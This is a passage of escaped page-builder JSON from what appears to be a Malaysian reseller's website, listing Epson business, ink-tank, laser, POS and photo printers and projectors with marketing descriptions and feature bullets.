height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"73\",\"right\":\"73\",\"bottom\":\"73\",\"left\":\"73\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 